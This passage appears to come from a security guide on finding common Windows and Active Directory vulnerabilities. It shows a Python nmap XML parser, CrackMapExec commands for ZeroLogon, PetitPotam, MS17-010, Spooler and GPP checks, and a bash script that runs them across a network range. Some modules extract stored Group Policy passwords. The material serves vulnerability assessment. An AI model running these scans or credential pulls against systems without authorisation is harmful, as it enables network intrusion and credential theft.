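        <table key="CVE-2017-0143"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
      <script id="smb-vuln-cve-2020-0796" output="LIKELY VULNERABLE (unstructured output)"/>
    </hostscript>
  </host>
</nmaprun>
"""

if __name__ == "__main__":
    for ip, script_id, state in parse_nmap_vulns(SAMPLE_NMAP_XML):
        print(f"{ip}\t{script_id}\t{state}")
```

Run the scans above with -oX and feed the file to parse_nmap_vulns(); the resulting host list is the patch-management ticket, not a target list.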

CrackMapExec Modules

bash
# List all available modules
crackmapexec smb -L

# Run critical vulnerability checks
crackmapexec smb 192.168.1.0/24 -u user -p pass -M zerologon
crackmapexec smb 192.168.1.0/24 -u user -p pass -M petitpotam
crackmapexec smb 192.168.1.0/24 -u '' -p '' -M ms17-010
crackmapexec smb 192.168.1.0/24 -u user -p pass -M spooler
crackmapexec smb 192.168.1.0/24 -u user -p pass -M gpp_password
crackmapexec smb 192.168.1.0/24 -u user -p pass -M gpp_autologin

Automated Scanning Script

bash
#!/bin/bash
# quick_vuln_scan.sh - run against a single host or a range:
#   ./quick_vuln_scan.sh 192.168.1.0/24 user 'pass'
set -u

if [ "$#" -ne 3 ]; then
    echo "Usage: $0 <target|range> <domain_user> <password>" >&2
    exit 1
fi

TARGET=$1
DOM_USER=$2    # deliberately not USER, which is the shell's own login variable
DOM_PASS=$3

echo "[*] Scanning $TARGET for common vulnerabilities..."

echo "[+] Checking MS17-010 (EternalBlue)..."
crackmapexec smb "$TARGET" -u '' -p '' -M ms17-010 2>/dev/null

echo "[+] Checking ZeroLogon..."
crackmapexec smb "$TARGET" -u '' -p '' -M zerologon 2>/dev/null

echo "[+] Checking PetitPotam..."
crackmapexec smb "$TARGET" -u "$DOM_USER" -p "$DOM_PASS" -M petitpotam 2>/dev/null

echo "[+] Checking Print Spooler..."
crackmapexec smb "$TARGET" -u "$DOM_USER" -p "$DOM_PASS" -M spooler 2>/dev/null

echo "[+] Checking GPP Passwords..."
crackmapexec smb "$TARGET" -u "$DOM_USER" -p "$DOM_PASS" -M gpp_password 2>/dev/null

echo "[*] Scan complete!"

Tip

Many of these vulnerabilities have been patched but remain prevalent in environments with poor patch management. Always check patch levels during enumeration.

External Resources